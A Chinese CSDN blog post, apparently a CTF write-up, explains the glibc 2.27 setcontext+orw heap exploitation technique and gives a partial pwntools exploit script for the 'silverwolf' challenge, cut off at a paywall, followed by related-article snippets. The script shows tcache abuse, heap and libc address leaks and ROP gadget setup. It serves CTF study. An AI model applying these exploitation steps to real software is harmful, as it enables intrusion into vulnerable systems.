setcontext+orw

于 2022-01-27 06:12:55 发布
阅读量748 收藏 3
点赞数
分类专栏: python 文章标签: 计算机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43479892/article/details/122711579
版权

Python微信订餐小程序课程视频

https://edu.csdn.net/course/detail/36074

Python实战量化交易理财系统

https://edu.csdn.net/course/detail/35475
setcontext+orw 大致可以把2.27,2.29做为两个分界点。

我们先来讨论 2.27 及以下的 setcontext + orw 的写法。

首先 setcontext 是什么?了解过 SROP 的师傅应该知道 pwntools 自带了一款可以控制寄存器值的工具。模板如下:

frame = SigreturnFrame()
frame.rsp = xxx
frame.rdi = xxx
frame.rsi = xxx
frame.rdx = xxx
frame.rip = xxx

它实质上就是依靠 setcontext 来实现的,我们从 IDA 里看看它究竟啥样。

我们可以很清楚地看出它的作用是通过 rdi 寄存器里的地址附近的地址里的值来给设置各个寄存器的值。glibc2.27 我们通常从 setcontext + 53 开始使用,也就是 mov   rsp, [rdi+0A0h] 那一行,在阅读其他师傅的文章后知道是因为上面的 fldenv  byte pte [rcx] 会造成程序执行时直接 crash。从 setcontext + 53 开始我们可以看到我们会给各个寄存器赋值。值得注意的是,mov     rcx, [rdi+0A8h]  和 push  rcx 实质上是在给我们的 rip 进行赋值。而众多寄存器唯一不可控制的是 rax寄存器,因为不仅没给 rax 赋值还在最后有一个 xor  eax,eax 。但这也意味着我们一定可以把 rax 设置成 0 。大部分题目中通过控制 rsp 和 rip 就可以很好地解决堆题不方便直接控制程序的执行流的问题。我们通常是吧 setcontext + 53 写进 __free_hook 或者 __malloc_hook 中,然后建立或者释放一个堆块,此时的 rdi 就会是该堆块的 chunk 头,那如果我们提前布局好堆,就意味着我们可以控制寄存器并劫持程序的执行流。

大体上思路差不多是两种(此处仅讨论 orw),第一种是直接控制程序执行流去执行ROP链,另一种是先用 mprotect 函数开辟一段可读可写可执行的空间再跳到上面去执行 shellcode。个人是比较喜欢直接执行 ROP 链的方法。

拿一个国赛的题 silverwolf 来加深 2.27 setcontext+orw

from pwn import *
context.arch = 'amd64'
context.log\_level = 'debug'

s = process('./silverwolf')
libc = ELF('./glibc-all-in-one/libs/2.27-3ubuntu1.4\_amd64/libc-2.27.so')

def add(size):
 s.sendlineafter(b'Your choice: ', b'1')
 s.sendlineafter(b'Index: ', b'0')
 s.sendlineafter(b'Size: ', str(size))

def edit(content):
 s.sendlineafter(b'Your choice: ', b'2')
 s.sendlineafter(b'Index: ', b'0')
 s.sendlineafter(b'Content: ', content)

def show():
 s.sendlineafter(b'Your choice: ', b'3')
 s.sendlineafter(b'Index: ', b'0')

def delete():
 s.sendlineafter(b'Your choice: ', b'4')
 s.sendlineafter(b'Index: ',b'0')

for i in range(7):
 add(0x78)
delete()
edit(b'a'*0x10)
delete()

show()
s.recvuntil(b'Content: ')
heap\_base = u64(s.recv(6).ljust(8,b'\x00')) & 0xfffffffffffff000
success('heap\_base=>' + hex(heap\_base))

add(0x78)
edit(p64(heap\_base + 0x10))
add(0x78)
add(0x78)
edit(b'\x00'*0x23 + b'\x07')
delete()

show()
libc\_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 - 0x10 - libc.sym['\_\_malloc\_hook']
success('libc\_base=>' + hex(libc\_base))

pop\_rdi\_ret = libc\_base + 0x00000000000215bf
pop\_rsi\_r15\_ret = libc\_base + 0x00000000000215bd
pop\_rdx\_ret = libc\_base + 0x0000000000001b96
pop\_rax\_ret = libc\_base + 0x0000000000043ae
最低0.47元/天 解锁文章
qq_43479892
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn题堆利用的一些姿势 -- setcontext
lifanxin的博客
06-27 3334
setcontext概述setcontext介绍setcontext具体操作setcontext实例总结 pwn题堆利用的一些姿势 – malloc_hook pwn题堆利用的一些姿势 – free_hook pwn题堆利用的一些姿势 – IO_FILE 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上
JavaScript+html5 canvas绘制的小人效果
11-24
`canvas.js`是这个例子的核心,它包含了一些自定义的函数,如`dyl.setContext`、`dyl.getDom`、`dyl._getContext`等,这些函数帮助简化Canvas操作。`dyl.createContext`函数接收一个canvas ID,返回2D渲染上下文,这...
setcontext
qq_51474381的博客
04-11 1262
1.setcontext是什么? 如上所示的代码段,从setcontext+53开始,这段汇编可用来实现对寄存器的赋值操作,但要控制好rdi与rcx。 rdi用来确定从什么地方取值赋给寄存器。 rcx先push再ret,实际上是对rip的控制,这里要确保rcx指向内存可读,不然会报错。 2.利用: 利用pwntools带的SigreturnFrame(),可以方便的构造出setcontext执行时对应的调用区域,实现对寄存器的控制,从而实现函数调用或orw调用。 ...
使用 setcontext 类函数实现 mini 协程库
Tattoo的博客
12-20 1871
协程实现原理 协程的本质都是通过修改 ESP 和 EIP 指针来实现的。其理论上还是单线程在运行. 程序在CPU上运行时依赖3个寄存器: ESP寄存值指向当前栈顶地址,指向当前指令需要的数据 EBP指向当前活动栈帧的基地址 指令寄存器IP,指向当前需要运行的指令 实现协程的多种方法 利用 glibc 的 ucontext 组件(云风的库) 使用汇编来切换上下文(实现miniC协程,腾讯lib...
setcontext getcontext makecontext swapcontext
purple尘的专栏
09-26 651
转自:https://blog.csdn.net/mrpre/article/details/78699865   Linux上下文切换以及协程        上下文切换,听起来虚无缥缈,什么是上下文,切换又是指的是什么?其实上下文就可以理解为一个进程所运行的相关的寄存器值,即包括sp/bp/pc等值,换句话说,一个上下文,就是包括了能够恢复进程运行所需要的所有必要的东西。所谓的切换, 那是多...
c语言context函数,利用setcontext函数实现协程的实验
weixin_36339234的博客
05-26 558
元旦期间我实验了最简单的setcontext族函数的使用,元旦过后决定利用setcontext族函数加pthread实现一个只针对Linux的协程库,昨天花了一天时间终于在深夜调通了程序。这个协程库我打算做成像erlang那样的actor模式,libactor这名字已经有人用了,那是一个基于pthread封装的actor库,所以我做的这个库名叫做libact。libact的基本原理就是程序启动时创...
JavaScript+html5 canvas制作色彩斑斓的正方形效果
11-26
`dyl.setContext`和`dyl._getContext`分别用于设置和获取Canvas的2D渲染上下文,这是进行绘图操作的基础。 接下来,我们看到一个嵌套的`for`循环,用于创建10x10个正方形,每个正方形的大小为100px x 100px,它们在...
osh-context-switch:带有(ex-)POSIX fcontext的C ++中基于光纤的上下文切换的示例
02-21
在POSIX光纤中,这通常由`setcontext()`, `getcontext()`, 和`swapcontext()`等函数来完成。理解这些函数如何交互以及何时调用它们是理解示例的关键。 3. **中断和信号处理**: 示例中可能包含了对信号的处理,如...
IME输入法编程[文].pdf
10-11
WM_IME_SETCONTEXT 消息的处理函数为 LRESULT CALLBACK UIWndProc(HWND hUIWnd, UINT uMsg, WPARAM wParam, LPARAM lParam),其中 wParam 参数用于标识是否激活输入法,lParam 参数用于标识对哪个窗口进行操作。...
context-manager:管理模板的上下文
06-23
上下文管理器 管理模板的上下文。使用安装npm i context-manager --save用法 var context = require ( 'context-manager' ) ;应用程序接口创建Context的实例。... setContext ( 'a' , { a : 'b' } )
Unix/Linux编程:getcontextsetcontext
OceanStar的博客
07-13 3101
ucontext该结构提供了所谓的用户上下文信息,用于描述调用信号处理器函数前的进程状态,其中包括上一个进程信号掩码以及寄存器的保存值,例如程序计数器(cp)和栈指针寄存器(sp),使用结构 ucontext_t 的其他函数有 getcontext()、makecontext()、setcontext()和 swapcontext(),分别对应的功能是允许进程去接收、创建、改变以及交换执行上下文。(这些操作有点类似于 setjmp()和 longjmp(),但更为通用。)可以使用这些函数来实现协程(cor.
【八芒星计划】 ORW
carol2358的博客
09-01 3940
本篇用来记录ORWORW可以分为2.27以下的orw和2.29以上的orw,如果是本地请自备flag文件 orw技术是用来应对沙盒的 文章目录oooorder2019-BALSN-CTF-plaintext oooorder 本题是2.27的orw,漏洞是uaf,漏洞在这里不展开讲,uaf也并不难 2.27的orw既可以使用heap_addr,也可以不要,先讲不需要heap_addr的,毕竟能少泄漏就少泄漏 最重要的是使用了setcontext这个函数,来达成我们控制寄存器的目的 2.27得setcont
协程分析之 context 上下文切换
INGNIGHT的专栏
09-08 1015
转载:https://juejin.im/entry/6844903448849154061 协程现在已经不是个新东西了,很多语言都提供了原生支持,也有很多开源的库也提供了协程支持。 最近为了要给tbox增加协程,特地研究了下各大开源协程库的实现,例如:libtask, libmill, boost, libco, libgo等等。 他们都属于stackfull协程,每个协程有完整的私有堆栈,里面的核心就是上下文切换(context),而stackless的协程,比较出名的有protothreads,
羊城杯wp
蚁景网安学院
09-23 4880
1PWN1、Babyrop栈溢出,且存在后门函数;利用func1将'/cin/sh'修改为'/bin/sh',利用func2调用参数执行system('/bin/sh')即可#!usr/b...
glibc2.27下堆题绕过沙箱
qq_45595732的博客
03-27 643
这里因为重点在于沙箱的绕过,漏洞就拿了一个最简单的uaf做演示。 最主要的是setcontext这个函数,可以看到setcontext+53之后控制了大量的寄存器(可以看作就是一个SigreturnFrame),寻址都是[rdi+x]的方式,那么我们假如劫持了free_hook为setcontext+53,此时rdi刚好是堆块内容的地址,我们可以直接放个SigreturnFrame进去,之后利用的话就按个人喜好了。我写了三种方式,本质都是orw。 1.mprotect+shellcode 2.rop(rop
SROP
热门推荐
钞sir的博客
12-20 1万+
简介 SROP的全称是Sigreturn Oriented Programming,这是ROP攻击方法中的一种,其中sigreturn是一个系统调用,在类unix系统发生signal的时候会被间接地调用;在传统的ROP攻击中我们需要寻找大量的gadgets来对寄存器进行赋值已达到我们的需求,而SROP可以减少我们寻找gadgets的难度… 前置知识 signal 机制 我们都知道在Linux中,系...
[tcache double free + orw]MynoteMax
huzai9527的博客
07-11 217
[tcache double free + orw]MynoteMax 1. ida分析 漏洞点和Mynote一样,但是加了沙盒 禁用了execve,因此同样利用double free 和 uaf 进行 orw进行操作 2. 思路 本题需要从堆打到栈,需要利用一些通用的gadgets, 如setcontext + 53 将 free_hook 设置为 setcontext +53,再在相应的chunk中布置相应的sigframe free掉相应的chunk触发setcontext(srop),
2.29leak off by null&&orw
qq_33590156的博客
12-04 2898
2.29版本下加了check,除了基本unlink检测还加上了判定presize和size相不相等的检测,这让之前的向前合并unlink夹chunk的思路变得不可行, 所以要利用就得结合fastbin smallbin largebin的残留指针,去构造unlink。 但这个题它可以直接leak堆上的残留指针,所以可以获取到heap地址,之后可以将heap指针(地址)p放在堆上构造fd = &p-0x18,bk = &p-0x10通过unlink检测 heap11_addr = heap_
HTML getContext()方法的定义及用法
syy_213213的博客
06-25 5644
SecurityContextHolder.setContext
最新发布
12-14
根据提供的引用内容,我们可以知道 SecurityContextHolder 是用来设置和获取 SecurityContext 的。而 SecurityContext 又是用来进行请求检查和访问控制等操作的。因此,SecurityContextHolder.setContext() 方法应该是用来设置当前线程的 SecurityContext 的。 具体使用方法如下: ```java SecurityContext context = SecurityContextHolder.createEmptyContext(); Authentication auth = new UsernamePasswordAuthenticationToken("username", "password"); context.setAuthentication(auth); SecurityContextHolder.setContext(context); ``` 上述代码中,我们首先创建了一个空的 SecurityContext 对象,然后创建了一个 Authentication 对象,将其设置为当前 SecurityContext 的认证信息,最后将 SecurityContext 对象设置到当前线程中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值